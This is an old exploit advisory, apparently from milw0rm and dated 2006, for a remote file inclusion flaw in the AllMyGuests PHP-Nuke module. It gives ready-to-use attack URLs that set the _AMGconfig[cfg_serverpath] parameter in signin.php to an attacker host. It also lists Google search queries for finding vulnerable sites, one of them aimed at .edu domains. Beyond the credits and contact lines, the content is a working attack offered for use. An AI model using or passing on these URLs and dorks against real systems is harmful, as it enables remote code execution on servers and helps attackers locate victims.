#============================================================================# # # AllMyGuests => ?_AMGconfig[cfg_serverpath] Remote File Inclusion Exploit #============================================================================# # # Scirpt Infected signin.php # # Critical level : Dangerous #============================================================================# # # By Br@Him Ma-Edition #============================================================================# # # Http://www.Af-Team.com # # Arabian-FighterZ Crew # # # # #=============================================================================# # # # Exploit: ################################################################################################### # # Http://www.Victime.com/modules.php?name=allmyguests # http://www.vicitime.com/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=Attacker # # # Search Google ( Nuke ET Copyright © 2004 por Truzone. ) # ( allinurl:*.edu.*/modules.php?name=allmyguests ) # ( "powered by AllMyGuests" ) # # To Contact: Brahim@legenie.net or Brahim118@yahoo.fr # # Greet : Silitoad STr0ke. Sn1p8r. Ope3runix . Simo64 .The_Condor.r00ted . Silitix . Zakix .Daftrix. # Oli Nsinah lmera lmajia :P ################################################################################################### By Morocco Notes: Nuke module as well as the standalone is vulnerable. http://www.vicitime.com/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=Attacker http://www.vicitime.com/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=Attacker /str0ke # milw0rm.com [2006-09-20]